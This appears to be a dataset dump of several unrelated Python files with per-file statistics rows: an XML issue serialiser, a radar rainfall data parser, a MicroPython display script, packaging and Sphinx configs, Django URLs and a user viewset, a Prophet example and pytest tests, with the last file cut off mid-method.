    (``const._ISSUE_ATTRIBUTES``) default to an empty string, all other
    fields default to an empty list.  Instances serialize to / restore
    from an lxml ``<issue>`` element via :meth:`dump` and :meth:`load`,
    optionally base64-encoding text payloads so the resulting XML stays
    readable.
    """

    def __init__(self, **kwargs):
        # Initialize every known field with its empty default, then
        # overwrite with whatever the caller supplied.
        for key in const._ISSUE_FIELD:
            setattr(self, key, "" if key in const._ISSUE_ATTRIBUTES else [])
        for key in kwargs:
            setattr(self, key, kwargs[key])
        # Issue ids are always handled as strings (they end up as XML
        # attribute values and hash keys).
        self._id = str(self._id)

    def __repr__(self) -> str:
        return "<Issue at %s>" % (self._id)

    def __str__(self) -> str:
        return str(self.messages[0])

    def __hash__(self) -> int:
        return hash(self._id)

    def __eq__(self, o) -> bool:
        # Defer to the other operand instead of raising AttributeError
        # when compared against a non-Issue object.
        if not isinstance(o, Issue):
            return NotImplemented
        return self._id == o._id

    @staticmethod
    def _encode(o: str) -> str:
        """Encode a text payload as base64 (utf-8 on the wire)."""
        return base64.standard_b64encode(o.encode(encoding='utf-8')).decode()

    @staticmethod
    def _decode(o: str) -> str:
        """Inverse of :meth:`_encode`."""
        return base64.standard_b64decode(o).decode(encoding="utf-8")

    def dump(self, encode: bool = True) -> lxml.etree.Element:
        """Serialize the issue into an lxml ``<issue>`` element.

        :param encode: base64-encode all text payloads (recommended).
            Passing ``False`` emits raw text and triggers an
            :class:`UnreadableXMLWarning`.
        """
        if encode:
            encoder = self._encode
        else:
            encoder = str
            warnings.warn(UnreadableXMLWarning(
                "You are saving the non-base64-encoded data, the XML " +
                "document generated might be unreadable due to illegal " +
                "characters in the document."
            ))
        ret_node = lxml.etree.Element("issue")
        # Scalar fields become attributes of the <issue> element.
        for attr in const._ISSUE_ATTRIBUTES:
            ret_node.set(attr, encoder(str(getattr(self, attr, ''))))
        # List-of-string fields become repeated child elements.
        for attr in const._ISSUE_MULTIPLE_ATTRIBUTES:
            for record in getattr(self, attr, []):
                new_node = lxml.etree.Element(attr)
                new_node.text = record
                ret_node.append(new_node)
        # List-of-dict fields become one container element whose children
        # (singular tag name) carry the dict entries as attributes.
        for attr in const._ISSUE_NODES:
            new_node = lxml.etree.Element(attr)
            for record in getattr(self, attr, []):
                new_sub_node = lxml.etree.Element(attr[:-1])
                for field in record:
                    new_sub_node.set(field, encoder(record[field]))
                new_node.append(new_sub_node)
            ret_node.append(new_node)
        # Comment objects keep their metadata as attributes (see
        # Comment.get_fields) and their content as (encoded) element text.
        for attr in const._ISSUE_COMPLEX:
            new_node = lxml.etree.Element(attr)
            for record in getattr(self, attr, []):
                new_sub_node = lxml.etree.Element(attr[:-1])
                for field in record.get_fields():
                    new_sub_node.set(field, getattr(record, field))
                new_sub_node.text = encoder(str(record))
                new_node.append(new_sub_node)
            ret_node.append(new_node)
        return ret_node

    def _load(self, root: lxml.etree._Element, decode: bool = True):
        """Populate ``self`` from an ``<issue>`` element (see :meth:`dump`)."""
        decoder = self._decode if decode else str
        for attr, value in root.attrib.items():
            setattr(self, attr, decoder(value))
        # Collect child data grouped by tag, mirroring dump()'s layout.
        data = {attr: [] for attr in (list(const._ISSUE_MULTIPLE_ATTRIBUTES) +
                                      list(const._ISSUE_NODES) +
                                      list(const._ISSUE_COMPLEX))}
        for child in root:
            if child.tag in const._ISSUE_MULTIPLE_ATTRIBUTES:
                data[child.tag].append(child.text)
            elif child.tag in const._ISSUE_NODES:
                for subchild in child:
                    data[child.tag].append({
                        _: decoder(subchild.attrib[_]) for _ in subchild.attrib
                    })
            elif child.tag in const._ISSUE_COMPLEX:
                for subchild in child:
                    ret = dict(subchild.attrib)
                    try:
                        ret['content'] = decoder(subchild.text)
                    except Exception:
                        # subchild.text may be None (empty element) or not
                        # valid base64; fall back to an empty body rather
                        # than aborting the whole load.
                        ret['content'] = ""
                    data[child.tag].append(Comment(**ret))
            # unknown tags are deliberately ignored
        for _ in data:
            setattr(self, _, data[_])
        return self

    @staticmethod
    def load(root: lxml.etree._Element, decode: bool = True) -> Issue:
        """Build a new :class:`Issue` from an ``<issue>`` element."""
        ret = Issue()
        return ret._load(root, decode)
| 32.455621 | 86 | 0.572288 | 654 | 5,485 | 4.58104 | 0.221713 | 0.028037 | 0.048064 | 0.03271 | 0.344793 | 0.291389 | 0.228638 | 0.128505 | 0.11749 | 0.11749 | 0 | 0.006223 | 0.326162 | 5,485 | 168 | 87 | 32.64881 | 0.804383 | 0.082407 | 0 | 0.300813 | 0 | 0 | 0.041541 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.146341 | false | 0 | 0.04878 | 0.089431 | 0.341463 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
876eb547b3459facec759055ce7fa56b3f74684a | 428 | py | Python | docs/source/conf.py | macro1/usps-client | 2da52e898ec8cb7619194a4200aa1c55c1312a66 | [
"ISC"
] | null | null | null | docs/source/conf.py | macro1/usps-client | 2da52e898ec8cb7619194a4200aa1c55c1312a66 | [
"ISC"
] | null | null | null | docs/source/conf.py | macro1/usps-client | 2da52e898ec8cb7619194a4200aa1c55c1312a66 | [
"ISC"
] | null | null | null | # Configuration file for the Sphinx documentation builder.
from usps_client.version import VERSION as version
release = version
project = "usps-client"
copyright = "2019, macro1"
author = "macro1"
extensions = ["sphinx.ext.autodoc", "sphinxcontrib.apidoc"]
templates_path = ["_templates"]
exclude_patterns = []
html_theme = "alabaster"
html_static_path = ["_static"]
apidoc_module_dir = "../../src"
apidoc_toc_file = False
| 22.526316 | 59 | 0.752336 | 51 | 428 | 6.078431 | 0.72549 | 0.064516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016043 | 0.126168 | 428 | 18 | 60 | 23.777778 | 0.812834 | 0.130841 | 0 | 0 | 0 | 0 | 0.275676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
876f9687ce17964a9b95e1f021971cdbe5981ac3 | 6,888 | py | Python | utils/cwbqpe.py | tingsyo/qpetw | e0f87a401649b367506370beeffaeffcc9484407 | [
"Unlicense"
] | null | null | null | utils/cwbqpe.py | tingsyo/qpetw | e0f87a401649b367506370beeffaeffcc9484407 | [
"Unlicense"
] | null | null | null | utils/cwbqpe.py | tingsyo/qpetw | e0f87a401649b367506370beeffaeffcc9484407 | [
"Unlicense"
] | null | null | null | import os, gzip, struct
import numpy as np
class cwbqpe:
'''Class for processing CWB pre-QC QPE data.'''
def __init__(self, file=None, data=None):
self.uri = file
self.header = None
self.data = data
def help(self):
print("This toolset provides functions accessing CWB QPESUMS data. \nThe data is 494972 bytes binary stored in gzip format. The first 170 bytes is the header, and the latter part is the QPE results on a (441x561) surface.\n")
def load_data(self, file=None):
# Check data file
if (self.uri is None):
if (file is None) or (not os.path.isfile(file)):
print('[Error] The data file is not specified or does not exist.')
return(None)
else:
self.uri = file
# Load data
with gzip.open(self.uri, 'rb') as f:
raw = f.read()
# Parse header
self.header = self.parse_header(raw[:170])
self.data = np.array(struct.unpack('247401h', raw[170:])).reshape(self.header['ny'], self.header['nx'])
# Scale data
self.data = np.round(self.data/self.header['var_scale'], 1)
return(0)
def parse_header(self, raw):
header = {}
# Time information
header['year'] = struct.unpack('i', raw[:4])[0]
header['month'] = struct.unpack('i', raw[4:8])[0]
header['day'] = struct.unpack('i', raw[8:12])[0]
header['hour'] = struct.unpack('i', raw[12:16])[0]
header['minute'] = struct.unpack('i', raw[16:20])[0]
header['second'] = struct.unpack('i', raw[20:24])[0]
# Data dimension
header['nx'] = struct.unpack('i', raw[24:28])[0]
header['ny'] = struct.unpack('i', raw[28:32])[0]
header['nz'] = struct.unpack('i', raw[32:36])[0]
# Projection and lat/lon
header['proj'] = struct.unpack('4s', raw[36:40])[0].decode('ISO-8859-1')
header['map_scale'] = struct.unpack('i', raw[40:44])[0]
header['projlat1'] = struct.unpack('i', raw[44:48])[0]
header['projlat2'] = struct.unpack('i', raw[48:52])[0]
header['projlon'] = struct.unpack('i', raw[52:56])[0]
header['alon'] = struct.unpack('i', raw[56:60])[0]
header['alat'] = struct.unpack('i', raw[60:64])[0]
# Delta in x-y-z
header['pxy_scale'] = struct.unpack('i', raw[64:68])[0]
header['dx'] = struct.unpack('i', raw[68:72])[0]
header['dy'] = struct.unpack('i', raw[72:76])[0]
header['dxy_scale'] = struct.unpack('i', raw[76:80])[0]
header['zht'] = struct.unpack('i', raw[80:84])[0]
header['z_scale'] = struct.unpack('i', raw[84:88])[0]
header['i_bb_mode'] = struct.unpack('i', raw[88:92])[0]
# Quality information
unkn01,unkn02,unkn03,unkn04,unkn05,unkn06,unkn07,unkn08,unkn09 = struct.unpack('iiiiiiiii', raw[92:128])
# Variable information
header['varname'] = struct.unpack('20s', raw[128:148])[0].decode('ISO-8859-1')
header['varunit'] = struct.unpack('6s', raw[148:154])[0].decode('ISO-8859-1')
header['var_scale'] = struct.unpack('i', raw[154:158])[0]
header['missing'] = struct.unpack('i', raw[158:162])[0]
header['nradar'] = struct.unpack('i', raw[162:166])[0]
header['mosradar'] = struct.unpack('4s', raw[166:170])[0].decode('ISO-8859-1')
#
return(header)
def find_nearest_value(self, lon, lat):
''' Find the closest point in the dataset to the specified lon/lat.'''
# Check data file
if (self.header is None):
print('[Error] The object has not yet been initialized.')
return(None)
# Derive the coordinate of the data object
lon0 = self.header['alon']/self.header['map_scale']
lat1 = self.header['alat']/self.header['map_scale']
dx = self.header['dx']/self.header['dxy_scale']
dy = self.header['dy']/self.header['dxy_scale']
lon1 = lon0 + (self.header['nx']-1)*dx
lat0 = lat1 - (self.header['ny']-1)*dy
lons = np.linspace(lon0, lon1, self.header['nx'])
lats = np.linspace(lat0, lat1, self.header['ny'])
# Check boundaries
if (lon<lon0) or (lon>lon1) or (lat<lat0) or (lat>lat1):
print("Specified lon/lat is outside of the data boundary: "+
str(lon0)+"~"+str(lon1)+", "+str(lat0)+"~"+str(lat1))
return(None)
# Find neighbors
ilonr = np.where(lons>lon)[0][0]
ilonl = np.where(lons<=lon)[0][-1]
ilatu = np.where(lats>lat)[0][0]
ilatd = np.where(lats<=lat)[0][-1]
# Determin the closest point
if (lon - lons[ilonl]) <= (lons[ilonr] - lon):
ilon = ilonl
else:
ilon = ilonr
if (lat - lats[ilatd]) <= (lats[ilatu] - lat):
ilat = ilatd
else:
ilat = ilatu
#
return((lons[ilon], lats[ilat], self.data[ilat,ilon]))
def find_interpolated_value(self, lon, lat):
    """Bilinearly interpolate the dataset value at the specified lon/lat.

    Returns the interpolated value on success, or ``None`` when the object
    is uninitialized or the query point lies outside the data domain.
    """
    # Check data file
    if self.header is None:
        print('[Error] The object has not yet been initialized.')
        return None
    # Derive the coordinate axes of the data grid from the header.
    lon0 = self.header['alon'] / self.header['map_scale']
    lat1 = self.header['alat'] / self.header['map_scale']
    dx = self.header['dx'] / self.header['dxy_scale']
    dy = self.header['dy'] / self.header['dxy_scale']
    lon1 = lon0 + (self.header['nx'] - 1) * dx
    lat0 = lat1 - (self.header['ny'] - 1) * dy
    lons = np.linspace(lon0, lon1, self.header['nx'])
    lats = np.linspace(lat0, lat1, self.header['ny'])
    # Check boundaries
    if (lon < lon0) or (lon > lon1) or (lat < lat0) or (lat > lat1):
        print("Specified lon/lat is outside of the data boundary: " +
              str(lon0) + "~" + str(lon1) + ", " + str(lat0) + "~" + str(lat1))
        return None
    # Locate the bracketing grid columns/rows.  searchsorted(..., 'right')
    # returns the first index strictly greater than the query (the right/
    # upper neighbour); clamping to the last index fixes the IndexError the
    # old np.where() lookup raised when lon == lon1 or lat == lat1.
    ilonr = min(int(np.searchsorted(lons, lon, side='right')), self.header['nx'] - 1)
    ilonl = ilonr - 1
    ilatu = min(int(np.searchsorted(lats, lat, side='right')), self.header['ny'] - 1)
    ilatd = ilatu - 1

    def bilinear_interpolation(x, y, x1, x2, y1, y2, z):
        '''Bilinear interpolation, ref:https://en.wikipedia.org/wiki/Bilinear_interpolation'''
        # Solve for the coefficients of f(x, y) = a0 + a1*x + a2*y + a3*x*y
        # passing through the four corner values in z.
        A = np.array([[1, x1, y1, x1 * y1],
                      [1, x1, y2, x1 * y2],
                      [1, x2, y1, x2 * y1],
                      [1, x2, y2, x2 * y2]])
        a = np.linalg.solve(A, z)
        return a[0] + a[1] * x + a[2] * y + a[3] * x * y

    # Corner values ordered to match the rows of A above.
    neighbours = [self.data[ilatd, ilonl], self.data[ilatu, ilonl],
                  self.data[ilatd, ilonr], self.data[ilatu, ilonr]]
    return bilinear_interpolation(lon, lat, lons[ilonl], lons[ilonr],
                                  lats[ilatd], lats[ilatu], neighbours)
| 47.178082 | 233 | 0.558072 | 970 | 6,888 | 3.931959 | 0.228866 | 0.08128 | 0.085212 | 0.104877 | 0.402202 | 0.356843 | 0.340325 | 0.325118 | 0.325118 | 0.325118 | 0 | 0.061629 | 0.260308 | 6,888 | 145 | 234 | 47.503448 | 0.686948 | 0.091609 | 0 | 0.392857 | 0 | 0.008929 | 0.138281 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.017857 | 0 | 0.089286 | 0.053571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
87717e4313134831e035a396909646739e4f9b6f | 676 | py | Python | main.py | SuperGarryGamer/open-salami | 82c77cfe32718da49cdfdbfdba668b278be80924 | [
"BSD-3-Clause"
] | null | null | null | main.py | SuperGarryGamer/open-salami | 82c77cfe32718da49cdfdbfdba668b278be80924 | [
"BSD-3-Clause"
] | null | null | null | main.py | SuperGarryGamer/open-salami | 82c77cfe32718da49cdfdbfdba668b278be80924 | [
"BSD-3-Clause"
] | null | null | null | import time
import uasyncio
from machine import Pin
import driver
# Target display refresh rate in frames per second.
FRAMERATE = 30
# Button debounce interval -- presumably seconds; confirm against usage.
BOUNCE_DELAY = 0.05

# Display driver; 0x3C is presumably the panel's I2C address -- TODO confirm
# it matches the wiring.
DISPLAY = driver.Display(0x3C)
# Timestamp of the last registered button press (not updated in visible code).
last_bounce_time = 0

# Draw the title screen, then load the pointer sprite at (30, 42).
DISPLAY.draw_bitmap(0, 0, '/title.pbm')
pointer_spr = driver.Sprite(DISPLAY, 30, 42)
pointer_spr.load_from_pbm('/pointer.pbm')
DISPLAY.on()

# Input buttons on GPIO 0 and GPIO 1.
A_PIN = Pin(0, Pin.IN)
B_PIN = Pin(1, Pin.IN)
# Latest sampled state for buttons A and B.
buttons = [False, False]

# def get_button_inputs():
#     buttons_old = buttons
#     buttons = [A_PIN.value(), B_PIN.value()]
async def draw_disp():
    """Flush pending drawing to the screen (delegates to DISPLAY.draw())."""
    DISPLAY.draw()
async def main():
    """Main loop: print button A's state and redraw at roughly FRAMERATE Hz."""
    while True:
        print(A_PIN.value())
        uasyncio.create_task(draw_disp())
        # Yield to the event loop between frames.  The original used the
        # blocking time.sleep(), which never yields, so the scheduled
        # draw_disp tasks could not run.
        await uasyncio.sleep(1 / FRAMERATE)
uasyncio.run(main()) | 18.27027 | 46 | 0.686391 | 103 | 676 | 4.320388 | 0.466019 | 0.026966 | 0.040449 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030521 | 0.176036 | 676 | 37 | 47 | 18.27027 | 0.768402 | 0.140533 | 0 | 0 | 0 | 0 | 0.038062 | 0 | 0 | 0 | 0.00692 | 0 | 0 | 1 | 0 | false | 0 | 0.173913 | 0 | 0.173913 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
87719faaac0b9d47604da6e340200e1581603f56 | 1,098 | py | Python | setup.py | hrpzcf/vidtoch | f7ef0253437223be9a6a1a6687bb0aec469738f2 | [
"MIT"
] | 1 | 2021-12-27T08:27:01.000Z | 2021-12-27T08:27:01.000Z | setup.py | hrpzcf/vidtoch | f7ef0253437223be9a6a1a6687bb0aec469738f2 | [
"MIT"
] | null | null | null | setup.py | hrpzcf/vidtoch | f7ef0253437223be9a6a1a6687bb0aec469738f2 | [
"MIT"
] | null | null | null | # coding: utf-8
from setuptools import find_packages, setup
from vidtoch import AUTHOR, EMAIL, NAME, VERSION, WEBSITE
description = "一个帮你将视频转为字符视频的模块。"
try:
with open("README.md", "r", encoding="utf-8") as mdfile:
long_description = mdfile.read()
except Exception:
long_description = description
setup(
name=NAME,
version=VERSION,
author=AUTHOR,
author_email=EMAIL,
maintainer=AUTHOR,
maintainer_email=EMAIL,
url=WEBSITE,
description=description,
long_description=long_description,
long_description_content_type="text/markdown",
license="MIT License",
packages=find_packages(),
install_requires=["opencv-python", "imgtoch>=0.2.2"],
python_requires=">=3.7",
classifiers=[
"Intended Audience :: Developers",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
keywords=["character video", "video", "character"],
)
| 28.153846 | 60 | 0.659381 | 119 | 1,098 | 5.97479 | 0.529412 | 0.105485 | 0.109705 | 0.109705 | 0.078762 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01611 | 0.208561 | 1,098 | 38 | 61 | 28.894737 | 0.802071 | 0.01184 | 0 | 0 | 0 | 0 | 0.301939 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.060606 | 0 | 0.060606 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8772a816426c89d517e6ce3effa48bd93c2dd2bb | 433 | py | Python | appg/api_messages.py | poxstone/appg | fe59b83d0f497e7d6033bde601bb1f61c95aba0c | [
"CNRI-Python",
"Condor-1.1",
"Naumen",
"Linux-OpenIB",
"MS-PL"
] | null | null | null | appg/api_messages.py | poxstone/appg | fe59b83d0f497e7d6033bde601bb1f61c95aba0c | [
"CNRI-Python",
"Condor-1.1",
"Naumen",
"Linux-OpenIB",
"MS-PL"
] | null | null | null | appg/api_messages.py | poxstone/appg | fe59b83d0f497e7d6033bde601bb1f61c95aba0c | [
"CNRI-Python",
"Condor-1.1",
"Naumen",
"Linux-OpenIB",
"MS-PL"
] | null | null | null | from protorpc import messages
import endpoints
class Greeting(messages.Message):
    """Greeting that stores a message."""
    # The greeting text (protorpc field number 1).
    message = messages.StringField(1)
class GreetingCollection(messages.Message):
    """Collection of Greetings."""
    # Repeated Greeting messages (protorpc field number 1).
    items = messages.MessageField(Greeting, 1, repeated=True)
STORED_GREETINGS = GreetingCollection(items=[
Greeting(message='hello world!'),
Greeting(message='goodbye world!'),
]) | 25.470588 | 61 | 0.734411 | 45 | 433 | 7.044444 | 0.555556 | 0.094637 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005391 | 0.143187 | 433 | 17 | 62 | 25.470588 | 0.849057 | 0.12933 | 0 | 0 | 0 | 0 | 0.070845 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
87738f3cbba8bb6fb3bd35ef57cb06f1d963828d | 508 | py | Python | minizoo/templates/codes/prophet.py | kasey-/minizoo | 4b24ab0b5760c0ac3f9b6e4c47f1bf6c4ca7bb1a | [
"Unlicense"
] | null | null | null | minizoo/templates/codes/prophet.py | kasey-/minizoo | 4b24ab0b5760c0ac3f9b6e4c47f1bf6c4ca7bb1a | [
"Unlicense"
] | 4 | 2020-07-16T17:59:25.000Z | 2022-02-12T06:33:52.000Z | minizoo/templates/codes/prophet.py | kasey-/minizoo | 4b24ab0b5760c0ac3f9b6e4c47f1bf6c4ca7bb1a | [
"Unlicense"
] | null | null | null | #Source: https://facebook.github.io/prophet/docs/quick_start.html
import pandas as pd
from fbprophet import Prophet

# Load the example log and rename the first two columns to the 'ds'/'y'
# names that Prophet expects.
history = pd.read_csv('./example_wp_log_peyton_manning.csv')
history = history.rename(columns={history.columns[0]: "ds", history.columns[1]: "y"})
history.head()

model = Prophet()
model.fit(history)

# Extend the frame one year past the observed data and forecast over it.
future = model.make_future_dataframe(periods=365)
future.tail()

forecast = model.predict(future)
forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail()

# Plot the forecast and its trend/seasonality components.
forecast_fig = model.plot(forecast)
components_fig = model.plot_components(forecast)
forecast_fig.show()
components_fig.show()
| 22.086957 | 65 | 0.724409 | 81 | 508 | 4.407407 | 0.604938 | 0.05042 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019523 | 0.09252 | 508 | 22 | 66 | 23.090909 | 0.754881 | 0.125984 | 0 | 0 | 0 | 0 | 0.14447 | 0.079007 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
87798b38a92c9bf4f78ce7b360d570618511a1be | 1,371 | py | Python | config/urls.py | gurnitha/2022-django-eshopper | eb570215fffb67f1061cb1c32f9dd16a9dfc9f52 | [
"Unlicense"
] | null | null | null | config/urls.py | gurnitha/2022-django-eshopper | eb570215fffb67f1061cb1c32f9dd16a9dfc9f52 | [
"Unlicense"
] | null | null | null | config/urls.py | gurnitha/2022-django-eshopper | eb570215fffb67f1061cb1c32f9dd16a9dfc9f52 | [
"Unlicense"
] | null | null | null | # confit/urls.py
# Django modules
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include
# Django locals
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('shop.urls')),
path('', include('blog.urls')),
path('', include('users.urls')),
# Accounts
path('accounts/', include('django.contrib.auth.urls')),
# admin/
# [name='index']
# products/ [name='products']
# product/1 [name='product_detail']
# cart/ [name='cart']
# contact/ [name='contact']
# posts/ [name='posts']
# post/1 [name='post_detail']
# signup/ [name='signup']
# logout/ [name='logout']
# accounts/ login/ [name='login']
# accounts/ logout/ [name='logout']
# accounts/ password_change/ [name='password_change']
# accounts/ password_change/done/ [name='password_change_done']
# accounts/ password_reset/ [name='password_reset']
# accounts/ password_reset/done/ [name='password_reset_done']
# accounts/ reset/<uidb64>/<token>/ [name='password_reset_confirm']
# accounts/ reset/done/ [name='password_reset_complete']
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | 32.642857 | 82 | 0.673961 | 161 | 1,371 | 5.602484 | 0.304348 | 0.079823 | 0.075388 | 0.053215 | 0.05765 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003475 | 0.160467 | 1,371 | 42 | 83 | 32.642857 | 0.780191 | 0.504012 | 0 | 0 | 0 | 0 | 0.101824 | 0.036474 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
877a802a5b8ecdef04600c8ce73a6b2f8a7bbe52 | 1,327 | py | Python | tests/transformers/add_key_values_test.py | santunioni/transformer | a34b8b40cba81382c8483d590050c3e36cee5bff | [
"MIT"
] | 1 | 2022-02-21T22:15:08.000Z | 2022-02-21T22:15:08.000Z | tests/transformers/add_key_values_test.py | santunioni/Transformer | a34b8b40cba81382c8483d590050c3e36cee5bff | [
"MIT"
] | null | null | null | tests/transformers/add_key_values_test.py | santunioni/Transformer | a34b8b40cba81382c8483d590050c3e36cee5bff | [
"MIT"
] | null | null | null | from typing import Any, Dict
import pytest
from transformer.transformers.add_key import AddKeyValues, AddKeyValuesConfig
@pytest.fixture()
def target_data(data):
    """Expected output: the input record plus the two expanded keys."""
    expected = data.copy()
    expected["a_a-value"] = True
    expected["b_b-value"] = "a-value_b-value"
    return expected
def test_add_placeholder(data, target_data):
    """Placeholders in keys and values are expanded from the input record."""
    config = AddKeyValuesConfig(key_values={"a_${a}": True, "b_${b}": "${a}_${b}"})
    transformer = AddKeyValues(config=config)
    result, _ = transformer.transform(data, {})
    assert result == target_data
def test_empiricus_dinamize_manipulation():
    """
    Covers the requested manipulation of data bound for Dinamize, for the
    Empiricus pipeline.
    """
    record: Dict[str, Any] = {
        "plan_type": "BOLSA",
        "proposal_status": "Aprovado",
    }
    expected: Dict[str, Any] = dict(record)
    expected["plan_type_bolsa"] = True
    expected["proposal_status_bolsa"] = True
    config = AddKeyValuesConfig(
        key_values={
            "plan_type_${plan_type}": True,
            "proposal_status_${plan_type}": True,
        },
    )
    transformer = AddKeyValues(config=config)
    result, _ = transformer.transform(record, {})
    assert result == expected
| 26.54 | 106 | 0.629239 | 154 | 1,327 | 5.155844 | 0.38961 | 0.062972 | 0.015113 | 0.083123 | 0.070529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.248681 | 1,327 | 49 | 107 | 27.081633 | 0.796389 | 0.094951 | 0 | 0 | 0 | 0 | 0.149873 | 0.060119 | 0 | 0 | 0 | 0 | 0.054054 | 1 | 0.081081 | false | 0 | 0.081081 | 0 | 0.189189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e3fb62f1b3bbafa427fe26bd9b2c0bfdf528e3c | 2,048 | py | Python | sys_app/views/user.py | sf0402/horse-admin | dd3f5c2d317763a1daeef40ce7833371e6ed5ce0 | [
"MIT"
] | 6 | 2019-12-17T03:16:38.000Z | 2020-07-10T10:45:24.000Z | sys_app/views/user.py | fearlessfei/horse-admin | dd3f5c2d317763a1daeef40ce7833371e6ed5ce0 | [
"MIT"
] | 5 | 2021-03-19T01:10:11.000Z | 2022-02-10T13:37:29.000Z | sys_app/views/user.py | sf0402/horse-admin | dd3f5c2d317763a1daeef40ce7833371e6ed5ce0 | [
"MIT"
] | 1 | 2020-11-10T07:54:52.000Z | 2020-11-10T07:54:52.000Z | # *-* coding: utf-8 *-*
from django.contrib.auth import get_user_model
from .base import AuthAPIViewSet
from utils.perm import HasPerm
from sys_app.serializers.user import UserSerializer
# Resolve the active user model once at import time.
User = get_user_model()
class userViewSet(AuthAPIViewSet):
    """User management view set.

    Non-superusers only see -- and may only modify or delete -- the users
    they created, plus their own account.
    """
    queryset = User.objects.all()
    serializer_class = UserSerializer

    def perform_create(self, serializer):
        # Record who created the user so later queries can scope by creator.
        serializer.save(creator=self.request.user)

    def get_queryset(self):
        # super(self.__class__, ...) recurses infinitely under subclassing;
        # name the class explicitly instead.
        queryset = super(userViewSet, self).get_queryset()
        if not self.request.user.is_superuser:
            user_id = self.request.user.id
            # Restrict to users created by the requester, plus themselves.
            queryset = queryset.filter(creator=user_id) | queryset.filter(id=user_id)
        return queryset

    @HasPerm(perm_code='sys:user:select')
    def list(self, request, *args, **kwargs):
        # Return the Response; the original dropped it, so the view
        # effectively returned None.
        return super(userViewSet, self).list(request, *args, **kwargs)

    @HasPerm(perm_code='sys:user:create')
    def create(self, request, *args, **kwargs):
        # Only superusers may grant superuser status.
        if not request.user.is_superuser and request.data['is_superuser']:
            raise self.response.Fail(message="您不是超级管理员不能设置用户为超级管理员!")
        return super(userViewSet, self).create(request, *args, **kwargs)

    @HasPerm(perm_code='sys:user:edit')
    def update(self, request, pk=None, *args, **kwargs):
        if not request.user.is_superuser:
            if request.data['is_superuser']:
                raise self.response.Fail(message="您不是超级管理员不能设置用户为超级管理员!")
            # Non-superusers may only edit users they can see (their own
